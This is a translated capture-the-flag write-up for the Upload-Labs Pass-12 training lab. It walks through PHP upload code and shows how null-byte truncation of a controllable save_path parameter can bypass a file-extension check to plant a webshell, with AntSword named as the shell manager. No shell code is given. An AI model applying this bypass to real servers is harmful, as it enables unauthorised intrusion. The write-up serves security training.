Readers can refer to and subscribe to the column: Upload-Labs shooting range offensive and defensive combat
Antsword Ant Sword
This question involves the use of the Ant Sword tool, the operation can refer to:
[Network Security] AntSword (ant sword) actual combat problem solving detailed analysis (entry)
posture
Backend logic code:
The source code analysis is as follows:
-
$ext_arr = array('jpg','png','gif');: Defines an array of file extensions that are allowed to be uploaded, only jpg, png and gif files are allowed to be uploaded. -
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);: Extract the file extension from the uploaded filename. Usesubstrthe function to intercept the string after the last dot (.), that is, to obtain the file extension. -
if(in_array($file_ext,$ext_arr)){: Checks if the file extension is in the array of extensions allowed for upload. -
- If the file extension is legal, enter the conditional judgment block:
$temp_file = $_FILES['upload_file']['tmp_name'];: Obtain the temporary storage path of the uploaded file on the server.$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;: Sets the save path of the uploaded file to the specified directory (via$_GET['save_path']get) plus a new file name consisting of a random number, the current date and time, and a file extension.
It can be seen that the file has been renamed, but the save_path parameter is controllable
Therefore, 00 can be used to truncate
The 00 truncation is a loophole in the operating system layer. Since the operating system is written in C language or assembly language, when defining a string in these two languages, \0 (that is, 0x00) is used as the end of the string. When the operating system recognizes a string, when it reads the \0 character, it considers that the end symbol of a string has been read.
Therefore, we can achieve the purpose of string truncation by modifying the data packet and inserting \0 characters.
Capture packets:
Repackage:
Packing:
Get the image upload path:
After that, the shell can be constructed, which will not be described in this article.
Summarize
The above is the detailed analysis of [Network Security] upload-labs Pass-12 problem solving, and the detailed analysis of [Network Security] xss-labs Pass-13 problem solving will be shared later.
I am Qiu said , see you next time.